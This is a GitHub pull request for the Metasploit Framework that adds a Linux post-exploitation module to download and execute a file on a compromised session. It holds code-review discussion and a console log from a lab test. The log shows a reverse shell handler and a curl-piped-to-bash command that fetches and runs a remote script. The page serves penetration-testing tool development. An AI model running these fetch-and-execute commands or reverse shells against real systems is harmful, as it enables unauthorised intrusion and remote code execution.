Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Post linux manage download exec #1596

Merged
merged 1 commit into from Mar 20, 2013
Merged

Post linux manage download exec #1596

merged 1 commit into from Mar 20, 2013

Conversation

jabra-
Copy link
Contributor

@jabra- jabra- commented Mar 14, 2013

Linux post module to download and run a file

jvazquez-r7
jvazquez-r7 reviewed Mar 14, 2013
View reviewed changes
lib/msf/core/post/common.rb
@@ -80,6 +80,10 @@ def cmd_exec(cmd, args=nil, time_out=15)
return o
end

def vcmd_exec(cmd, args=nil, time_out=15)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I must to admit I dont see a real benefit defining this method into the mixin. And I dont like the idea of combining presentation helpers with logic into the same mixin. Maybe would be a good idea to add this helper into your modules atm.

But yeah! it's just my opinion :) So I'm going to ask someone more to share opinion about this point!

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This was done so i wouldn't need to have like 10 modules all with the same
method just copied and pasted ...

On Thu, Mar 14, 2013 at 6:06 PM, Juan Vazquez notifications@github.comwrote:

In lib/msf/core/post/common.rb:

@@ -80,6 +80,10 @@ def cmd_exec(cmd, args=nil, time_out=15)
return o
end

  • def vcmd_exec(cmd, args=nil, time_out=15)

I must to admit I dont see a real benefit defining this method into the
mixin. And I dont like the idea of combining presentation helpers with
logic into the same mixin. Maybe would be a good idea to add this helper
into your modules atm.

But yeah! it's just my opinion :) So I'm going to ask someone more to
share opinion about this point!


Reply to this email directly or view it on GitHubhttps://github.com//pull/1596/files#r3382825
.

@jabra-
Copy link
Contributor Author

jabra- commented Mar 14, 2013

added auto-detection of bash and curl from the PATH.

@jvazquez-r7
Copy link
Contributor

Hi @jasbro ,

After discussing with @jlee-r7, we're going to ask avoiding to merge the vcmd_exec into the Common Post mixin, because in this way it's merging a presentation helper into a "logic" mixin.

On the other hand, as pointed by @jlee-r7, doesn't seem the best idea vprint_status'd the command before running it. Also pointed by him, when there are commands without output, vprint empties outputs can annoy to the user.

I guess would be a good idea to include the helper in your modules atm, following the recommendations above. Sure it would help to accelerate the review :)

Thanks very much in advance! and if you have any questions, don't hesitate to ask !

@jvazquez-r7
Copy link
Contributor

Working as expected with shell sessions:

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (36 bytes) to 192.168.1.159
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.159:48138) at 2013-03-20 16:44:49 +0100

msf exploit(handler) > use post/linux/manage/download_exec
msf post(download_exec) > show options

Module options (post/linux/manage/download_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   URL                       yes       Full URL of file to download.

msf post(download_exec) > set SESSION 1
SESSION => 1
msf post(download_exec) > set url http://localhost/test.sh
url => http://localhost/test.sh
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > sessions -i 1
[*] Starting interaction with 1...

1730827770
lrMxozAifMwvqjccHHmsjOvzwrVuAQGd
aDiCHMssYpPGXcFChzjDdguTqNyAJKZw
UnAonWqkQUxQSdcCPKfhzynIczTNroXD
cat /var/www/test.sh
#!/bin/bash

touch /tmp/pwned.txt
echo "hola" > /tmp/pwned.txt
cat /tmp/pwned.txt
hola
^C
Abort session 1? [y/N]  y

[*] 192.168.1.159 - Command shell session 1 closed.  Reason: User exit
msf post(download_exec) >

But I've notices when curl isn't available on the $PATH it just exists silently, because of this I've tried to solve with https://github.com/jasbro/metasploit-framework/pull/2 , it tries to check if curl is in the path before proceeding. I think is valuable, but please, feel free to review and if agree with changes just land it, and this pr will be updated automatically :)

@jvazquez-r7
Copy link
Contributor

Thanks for landing it, merging!

@jvazquez-r7 jvazquez-r7 merged commit aa22a82 into rapid7:master Mar 20, 2013
@jvazquez-r7 jvazquez-r7 mentioned this pull request Mar 21, 2013
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jabra- @jvazquez-r7